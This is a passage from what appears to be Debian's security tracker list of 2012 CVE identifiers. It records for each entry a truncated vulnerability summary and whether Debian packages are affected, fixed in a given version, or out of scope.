11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5257 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5256 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5255 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5254 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5253 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5252 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5251 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5250 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5249 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5248 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5247 RESERVED CVE-2012-5246 RESERVED CVE-2012-5245 RESERVED CVE-2012-5244 RESERVED CVE-2012-5243 RESERVED CVE-2012-5242 RESERVED CVE-2012-5241 RESERVED NOT-FOR-US: PEAR module for Twitter CVE-2012-5240 (Buffer overflow in the dissect_tlv function in ...) - wireshark 1.8.2-2 (bug #689972) [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-5239 REJECTED CVE-2012-5238 (epan/dissectors/packet-ppp.c in the PPP dissector in Wireshark 1.8.x ...) - wireshark 1.8.2-2 (bug #689972) [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-5237 (The dissect_hsrp function in epan/dissectors/packet-hsrp.c in the HSRP ...) - wireshark 1.8.2-2 (bug #689972) [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-5236 [Admin can decrypt user files] RESERVED - owncloud (low) [wheezy] - owncloud (Low risk, requires entensive changes, will be fully fixed in 5.0) NOTE: http://owncloud.org/about/security/advisories/CVE-2012-5236/ CVE-2012-5235 RESERVED CVE-2012-5234 (Open redirect vulnerability in index.php in ocPortal before 7.1.6 ...) - ocportal (bug #625865) CVE-2012-5233 (Cross-site scripting (XSS) vulnerability in the stickynote module ...) NOT-FOR-US: Drupal stickynote CVE-2012-5232 (Cross-site scripting (XSS) vulnerability in the Quickl Form component ...) NOT-FOR-US: Joomla component CVE-2012-5231 (miniCMS 1.0 and 2.0 allows remote attackers to execute arbitrary PHP ...) NOT-FOR-US: miniCMS CVE-2012-5230 (Unspecified vulnerability in the JE Story Submit (com_jesubmit) ...) NOT-FOR-US: Joomla jesusmit CVE-2012-5229 (Cross-site scripting (XSS) vulnerability in css/gallery-css.php in the ...) NOT-FOR-US: WP Gallery2 CVE-2012-5228 (Cross-site scripting (XSS) vulnerability in admin/index.php in phplist ...) NOT-FOR-US: phplist CVE-2012-5227 (SQL injection vulnerability in administrer/tva.php in Peel SHOPPING ...) NOT-FOR-US: Peel Shopping CVE-2012-5226 (Multiple cross-site scripting (XSS) vulnerabilities in Peel SHOPPING ...) NOT-FOR-US: Peel Shopping CVE-2012-5225 (Cross-site scripting (XSS) vulnerability in webscr.php in xClick Cart ...) NOT-FOR-US: xClick CVE-2012-5224 (PHP remote file inclusion vulnerability in ...) NOT-FOR-US: vbadvanced CMPS CVE-2012-5223 (The proc_deutf function in includes/functions_vbseocp_abstract.php in ...) NOT-FOR-US: vBSEO CVE-2012-5222 (HP Service Manager Web Tier 9.31 before 9.31.2004 p2 allows remote ...) NOT-FOR-US: HP Service Manager CVE-2012-5221 (Unspecified vulnerability on the HP LaserJet 4xxx, 5200, 90xx, M30xx, ...) NOT-FOR-US: HP LaserJet CVE-2012-5220 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, ...) NOT-FOR-US: HP Storage Data Protector CVE-2012-5219 (Cross-site scripting (XSS) vulnerability in HP Managed Printing ...) NOT-FOR-US: HP Managed Printing Administration CVE-2012-5218 (HP ElitePad 900 PCs with BIOS F.0x before F.01 Update 1.0.0.8 do not ...) NOT-FOR-US: HP ElitePad 900 CVE-2012-5217 RESERVED CVE-2012-5216 (Cross-site request forgery (CSRF) vulnerability on HP ProCurve 1700-8 ...) NOT-FOR-US: HP ProCurve CVE-2012-5215 (Unspecified vulnerability on the HP LaserJet Pro M1212nf, M1213nf, ...) NOT-FOR-US: HP LaserJet Pro CVE-2012-5214 (Unspecified vulnerability in HP ServiceCenter 6.2.8 before 6.2.8.10 ...) NOT-FOR-US: HP ServiceCenter CVE-2012-5213 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5212 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5211 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5210 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5209 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5208 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5207 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5206 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5205 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5204 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5203 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5202 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5201 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5200 (Cross-site scripting (XSS) vulnerability in HP Intelligent Management ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5199 (Unspecified vulnerability in HP ArcSight Connector Appliance 6.3 and ...) NOT-FOR-US: HP ArcSight Connector Appliance CVE-2012-5198 (Unspecified vulnerability in HP ArcSight Connector Appliance before ...) NOT-FOR-US: HP ArcSight Connector Appliance CVE-2011-5202 (BazisVirtualCDBus.sys in WinCDEmu 3.6 allows local users to cause a ...) NOT-FOR-US: WinCDEmu CVE-2012-5197 (Multiple unspecified vulnerabilities in Condor 7.6.x before 7.6.10 and ...) - condor 7.8.2~dfsg.1-1+deb7u1 (unimportant) NOTE: Not exploitable according to upstream CVE-2012-5196 (Multiple buffer overflows in Condor 7.6.x before 7.6.10 and 7.8.x ...) - condor 7.8.2~dfsg.1-1+deb7u1 (unimportant) NOTE: Not exploitable according to upstream CVE-2012-5195 (Heap-based buffer overflow in the Perl_repeatcpy function in util.c in ...) {DSA-2586-1} - perl 5.14.2-14 (bug #689314) CVE-2012-5194 RESERVED CVE-2012-5193 RESERVED CVE-2012-5192 RESERVED CVE-2012-5191 RESERVED CVE-2012-5190 RESERVED CVE-2012-5189 REJECTED CVE-2012-5188 (Untrusted search path vulnerability in mora Downloader before 1.0.0.1 ...) NOT-FOR-US: mora Downloader CVE-2012-5187 (The Weathernews Touch application 2.3.2 and earlier for Android allows ...) NOT-FOR-US: Android CVE-2012-5186 (Cross-site scripting (XSS) vulnerability in FLUGELz netmania myu-s and ...) NOT-FOR-US: FLUGELz netmania myu-s, PHP WeblogSystem CVE-2012-5185 (Directory traversal vulnerability in the Olive Toast Documents Pro ...) NOT-FOR-US: Olive Toast Documents Pro File Viewer CVE-2012-5184 (Cross-site scripting (XSS) vulnerability in the Olive Toast Documents ...) NOT-FOR-US: Olive Toast Documents Pro File Viewer CVE-2012-5183 (The Loctouch application 3.4.6 and earlier for Android allows ...) NOT-FOR-US: Loctouch application for Android CVE-2012-5182 (The Loctouch application 3.4.6 and earlier for Android does not ...) NOT-FOR-US: Loctouch application for Android CVE-2012-5181 (Cross-site scripting (XSS) vulnerability in concrete5 Japanese 5.5.1 ...) NOT-FOR-US: concrete5 CVE-2012-5180 (The Opera Mobile application before 12.1 and Opera Mini application ...) NOT-FOR-US: Opera Mobile application for Android CVE-2012-5179 (The Boat Browser application before 4.2 and Boat Browser Mini ...) NOT-FOR-US: Boat Browser application for Android CVE-2012-5178 (Cross-site request forgery (CSRF) vulnerability in the Welcart plugin ...) NOT-FOR-US: WordPress Welcart plugin CVE-2012-5177 (Cross-site scripting (XSS) vulnerability in the Welcart plugin before ...) NOT-FOR-US: WordPress Welcart plugin CVE-2012-5176 (Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT ...) NOT-FOR-US: KENT-WEB ACCESS REPORT CVE-2012-5175 (Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT 4.2 ...) NOT-FOR-US: KENT-WEB ACCESS REPORT CVE-2012-5174 (The KYOCERA AH-K3001V, AH-K3002V, WX300K, WX310K, WX320K, and WX320KR ...) NOT-FOR-US: KYOCERA CVE-2012-5173 (Session fixation vulnerability in BIGACE before 2.7.8 allows remote ...) NOT-FOR-US: BIGACE CVE-2012-5172 (The Asial Monaca Debugger application before 1.4.2 for Android allows ...) NOT-FOR-US: Asial Monaca Debugger CVE-2012-5171 (Directory traversal vulnerability in Be Graph BeZIP before 3.10 allows ...) NOT-FOR-US: Be Graph's BeZIP CVE-2012-5170 (Open redirect vulnerability in Pebble before 2.6.4 allows remote ...) NOT-FOR-US: Pebble blog CVE-2012-5169 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: ATutor AContent CVE-2012-5168 (ATutor AContent before 1.2-1 allows remote attackers to modify ...) NOT-FOR-US: ATutor AContent CVE-2012-5167 (Multiple SQL injection vulnerabilities in ATutor AContent before 1.2-1 ...) NOT-FOR-US: ATutor AContent CVE-2012-5166 (ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before ...) {DSA-2560-1} - bind9 1:9.8.1.dfsg.P1-4.3 (bug #690118) - isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp) CVE-2012-5165 RESERVED CVE-2012-5164 (Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before ...) NOT-FOR-US: Fork CMS CVE-2012-5163 (Cross-site scripting (XSS) vulnerability in oc-admin/ajax/ajax.php in ...) NOT-FOR-US: OSClass not in Debian CVE-2012-5162 (Multiple SQL injection vulnerabilities in oc-admin/ajax/ajax.php in ...) NOT-FOR-US: OSClass not in Debian CVE-2012-5161 (The XML Service interface in Citrix XenApp 6.5 and 6.5 Feature Pack 1 ...) NOT-FOR-US: Citrix XenApp CVE-2012-5160 RESERVED CVE-2012-5158 RESERVED CVE-2012-5157 (Google Chrome before 24.0.1312.52 does not properly handle image data ...) - chromium-browser (PDF functionality not available in Chromium) CVE-2012-5156 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser (PDF functionality not available in Chromium) CVE-2012-5155 (Google Chrome before 24.0.1312.52 on Mac OS X does not use an ...) - chromium-browser (Only affects MacOS X) CVE-2012-5154 (Integer overflow in Google Chrome before 24.0.1312.52 on Windows ...) - chromium-browser (Only affects Windows) CVE-2012-5153 (Google V8 before 3.14.5.3, as used in Google Chrome before ...) - libv8 (bug #702261; kMinFixedIndex and kMaxFixedIndex are hard-coded to the correct values in 3.8.9.20, a later commit introduced a caclulation that produced incorrect values) - chromium-browser 24.0.1312.68-1 TODO: re-check uploads newer than 3.8.9.20 CVE-2012-5152 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5151 (Integer overflow in Google Chrome before 24.0.1312.52 allows remote ...) - chromium-browser (PDF functionality not available in Chromium) CVE-2012-5150 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 - ffmpeg - libav 6:0.8.6-1 CVE-2012-5149 (Integer overflow in the audio IPC layer in Google Chrome before ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5148 (The hyphenation functionality in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5147 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5146 (Google Chrome before 24.0.1312.52 allows remote attackers to bypass ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5145 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5144 (Google Chrome before 23.0.1271.97, and Libav 0.7.x before 0.7.7 and ...) - chromium-browser 24.0.1312.68-1 - ffmpeg - libav 6:0.8.5-1 (bug #694483) NOTE: http://git.libav.org/?p=libav.git;a=commitdiff;h=6d5b0092678b2a95dfe209a207550bd2fe9ef646 is supposed to fix this. NOTE: Upstream has a sample, but can only be reproduced with asan/tsan. However, Chrome seems to be affected by this somehow more directly. CVE-2012-5143 (Integer overflow in Google Chrome before 23.0.1271.97 allows remote ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5142 (Google Chrome before 23.0.1271.97 does not properly handle history ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5141 (Google Chrome before 23.0.1271.97 does not properly restrict ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5140 (Use-after-free vulnerability in Google Chrome before 23.0.1271.97 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5139 (Use-after-free vulnerability in Google Chrome before 23.0.1271.97 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5138 (Google Chrome before 23.0.1271.95 does not properly handle file paths, ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5137 (Use-after-free vulnerability in Google Chrome before 23.0.1271.95 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5136 (Google Chrome before 23.0.1271.91 does not properly perform a cast of ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5135 (Use-after-free vulnerability in Google Chrome before 23.0.1271.91 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5134 (Heap-based buffer underflow in the xmlParseAttValueComplex function in ...) {DSA-2580-1} - libxml2 2.8.0+dfsg1-7 (bug #694521) CVE-2012-5133 (Use-after-free vulnerability in Google Chrome before 23.0.1271.91 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5132 (Google Chrome before 23.0.1271.91 allows remote attackers to cause a ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5131 (Google Chrome before 23.0.1271.91 on Mac OS X does not properly ...) - chromium-browser (MacOS-specific) CVE-2012-5130 (Skia, as used in Google Chrome before 23.0.1271.91, allows remote ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5129 (Heap-based buffer overflow in the WebGL subsystem in Google Chrome OS ...) - mesa 8.0.5-3 (bug #695248) [squeeze] - mesa (Vulnerable code not present) CVE-2012-5128 (Google V8 before 3.13.7.5, as used in Google Chrome before ...) - libv8 (Doesn't affect 3.8.9, see bug #694808) CVE-2012-5127 (Integer overflow in Google Chrome before 23.0.1271.64 allows remote ...) - chromium-browser 24.0.1312.68-1 - libwebp 0.1.3-3+nmu1 (bug #704573) NOTE: fixed in experimental version 0.2.1-1 NOTE: https://bugs.gentoo.org/show_bug.cgi?id=442152 NOTE: Upstream announce: https://groups.google.com/a/webmproject.org/forum/?fromgroups=#!topic/webp-discuss/QTtgi8YfgkE CVE-2012-5126 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5125 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5124 (Google Chrome before 23.0.1271.64 does not properly handle textures, ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5123 (Skia, as used in Google Chrome before 23.0.1271.64, allows remote ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5122 (Google Chrome before 23.0.1271.64 does not properly perform a cast of ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5121 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5120 (Google V8 before 3.13.7.5, as used in Google Chrome before ...) - libv8 (Doesn't affect 3.8.9, see bug #694808) CVE-2012-5119 (Race condition in Pepper, as used in Google Chrome before ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5118 (Google Chrome before 23.0.1271.64 on Mac OS X does not properly ...) - chromium-browser (MacOS-specific) CVE-2012-5117 (Google Chrome before 23.0.1271.64 does not properly restrict the ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5116 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...) - chromium-browser 24.0.1312.68-1 CVE-2012-5115 (Google Chrome before 23.0.1271.64 on Mac OS X does not properly ...) - chromium-browser (MacOS-specific) CVE-2012-5114 RESERVED CVE-2012-5113 RESERVED CVE-2012-5112 (Use-after-free vulnerability in the SVG implementation in WebKit, as ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5111 (Google Chrome before 22.0.1229.92 does not monitor for crashes of ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5110 (The compositor in Google Chrome before 22.0.1229.92 allows remote ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5109 (The International Components for Unicode (ICU) functionality in Google ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5108 (Race condition in Google Chrome before 22.0.1229.92 allows remote ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5107 RESERVED CVE-2012-5106 RESERVED CVE-2012-5159 (phpMyAdmin 3.5.2.2, as distributed by the cdnetworks-kr-1 mirror ...) - phpmyadmin CVE-2012-5105 (Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager ...) NOT-FOR-US: SQLiteManager CVE-2012-5104 (Cross-site scripting (XSS) vulnerability in forums/ubbthreads.php in ...) NOT-FOR-US: UBB.threads CVE-2012-5103 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Ggb guestbook CVE-2012-5102 (Cross-site scripting (XSS) vulnerability in inc/extensions.php in ...) NOT-FOR-US: VertigoServ CVE-2012-5101 (SQL injection vulnerability in the JExtensions JE Poll component ...) NOT-FOR-US: Joomla! extension CVE-2012-5100 (Directory traversal vulnerability in HServer 0.1.1 allows remote ...) NOT-FOR-US: HServer CVE-2012-5099 (Cross-site scripting (XSS) vulnerability in list.php in PHPB2B 4.1 and ...) NOT-FOR-US: PHPB2B CVE-2012-5098 (Multiple SQL injection vulnerabilities in Php-X-Links, possibly 1.0, ...) NOT-FOR-US: PHP-X-Links CVE-2012-5097 (Unspecified vulnerability in the Oracle Access Manager component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-5096 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 (Only affects 5.5) - mysql-5.5 5.5.29+dfsg-1 CVE-2012-5095 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Oracle Sun Solaris 10 CVE-2012-5094 (Unspecified vulnerability in the Oracle Agile PLM for Process ...) NOT-FOR-US: Oracle Agile PLM CVE-2012-5093 (Unspecified vulnerability in the Oracle Agile PLM for Process ...) NOT-FOR-US: Oracle Agile PLM CVE-2012-5092 (Unspecified vulnerability in the Oracle Agile PLM for Process ...) NOT-FOR-US: Oracle Agile PLM CVE-2012-5091 (Unspecified vulnerability in the Oracle Agile Product Supplier ...) NOT-FOR-US: Oracle Supply Chain CVE-2012-5090 (Unspecified vulnerability in the Oracle Agile PLM for Process ...) NOT-FOR-US: Oracle Supply Chain CVE-2012-5089 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5088 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5087 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5086 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) CVE-2012-5085 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5084 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5083 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2012-5082 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2012-5081 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5080 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2012-5079 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5078 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...) - openjdk-6 (JavaFX not part of OpenJDK) - openjdk-7 (JavaFX not part of OpenJDK) CVE-2012-5077 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5076 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5075 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5074 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5073 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5072 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5071 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5070 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5069 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5068 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774) - openjdk-7 7u3-2.1.3-1 (bug #690774) CVE-2012-5067 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-5066 (Unspecified vulnerability in the Oracle Central Designer component in ...) NOT-FOR-US: Oracle Industry Applications CVE-2012-5065 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-5064 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-5063 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-5062 (Unspecified vulnerability in the Enterprise Manager Base Platform ...) NOT-FOR-US: Oracle CVE-2012-5061 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-5060 (Unspecified vulnerability in the Server component in Oracle MySQL ...) - mysql-5.1 - mysql-5.5 5.5.29+dfsg-1 CVE-2012-5059 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-5058 (Unspecified vulnerability in the Oracle iStore component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-5057 RESERVED CVE-2012-5056 RESERVED CVE-2012-5055 (DaoAuthenticationProvider in VMware SpringSource Spring Security ...) NOT-FOR-US: VMware CVE-2012-5054 (Integer overflow in the copyRawDataTo method in the Matrix3D class in ...) NOT-FOR-US: Adobe Flash player CVE-2012-5053 (Cross-site scripting (XSS) vulnerability in the Receiver Web User ...) NOT-FOR-US: Trimble Infrastructure GNSS Series Receivers CVE-2012-5052 RESERVED CVE-2012-5051 (Directory traversal vulnerability in VMware CapacityIQ 1.5.x allows ...) NOT-FOR-US: VMware CVE-2012-5050 (Cross-site scripting (XSS) vulnerability in the server in VMware ...) NOT-FOR-US: VMware CVE-2012-5049 (APIFTP Server in Optimalog Optima PLC 1.5.2 and earlier allows remote ...) NOT-FOR-US: Optimalog Optima PLC CVE-2012-5048 (APIFTP Server in Optimalog Optima PLC 1.5.2 and earlier allows remote ...) NOT-FOR-US: Optimalog Optima PLC CVE-2012-5047 RESERVED CVE-2012-5046 RESERVED CVE-2012-5045 RESERVED CVE-2012-5044 RESERVED CVE-2012-5043 RESERVED CVE-2012-5042 RESERVED CVE-2012-5041 RESERVED CVE-2012-5040 RESERVED CVE-2012-5039 RESERVED CVE-2012-5038 RESERVED CVE-2012-5037 RESERVED CVE-2012-5036 RESERVED CVE-2012-5035 RESERVED CVE-2012-5034 RESERVED CVE-2012-5033 RESERVED CVE-2012-5032 RESERVED CVE-2012-5031 RESERVED CVE-2012-5030 RESERVED CVE-2012-5029 RESERVED CVE-2012-5028 RESERVED CVE-2012-5027 RESERVED CVE-2012-5026 RESERVED CVE-2012-5025 RESERVED CVE-2012-5024 RESERVED CVE-2012-5023 RESERVED CVE-2012-5022 RESERVED CVE-2012-5021 RESERVED CVE-2012-5020 RESERVED CVE-2012-5019 RESERVED CVE-2012-5018 RESERVED CVE-2012-5017 RESERVED CVE-2012-5016 RESERVED CVE-2012-5015 RESERVED CVE-2012-5014 RESERVED CVE-2012-5013 RESERVED CVE-2012-5012 RESERVED CVE-2012-5011 RESERVED CVE-2012-5010 RESERVED CVE-2012-5009 RESERVED CVE-2012-5008 RESERVED CVE-2011-5201 (Multiple SQL injection vulnerabilities in sign.php in tinyguestbook ...) NOT-FOR-US: tinyguestbook CVE-2011-5200 (Multiple SQL injection vulnerabilities in DeDeCMS, possibly 5.6, allow ...) NOT-FOR-US: DeDeCMS CVE-2011-5199 (Cross-site scripting (XSS) vulnerability in sign.php in tinyguestbook ...) NOT-FOR-US: tinyguestbook CVE-2011-5198 (SQL injection vulnerability in search.php in Neturf eCommerce Shopping ...) NOT-FOR-US: Neturf eCommerce Shopping Cart CVE-2011-5197 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Public Knowledge Project Open Harvester Systems CVE-2011-5196 (Cross-site request forgery (CSRF) vulnerability in ...) - ojs (low) [squeeze] - ojs (Minor issue) CVE-2011-5195 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Public Knowledge Project Open Conference Systems CVE-2011-5194 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Wordpress Whois search plugin, not in Debian CVE-2011-5193 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Wordpress Whois search plugin, not in Debian CVE-2011-5192 (Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty ...) NOT-FOR-US: Wordpress Pretty Link Lite plugin, not in Debian CVE-2011-5191 (Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty ...) NOT-FOR-US: Wordpress Pretty Link Lite plugin, not in Debian CVE-2012-5007 (The Fill PDF module 7.x-1.x before 7.x-1.2 for Drupal allows remote ...) NOT-FOR-US: Drupal addon Fill PDF CVE-2012-5006 (Heap-based buffer overflow in npdjvu.dll in Caminova DjVu Browser ...) NOT-FOR-US: Caminova DjVu Browser CVE-2012-5005 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: VR GPub CVE-2012-5004 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Parallels H-Sphere CVE-2012-5003 (nxapplet.jar in No Machine NX Web Companion 3.x and earlier does not ...) NOT-FOR-US: No Machine NX Web Companion CVE-2012-5002 (Stack-based buffer overflow in SR10 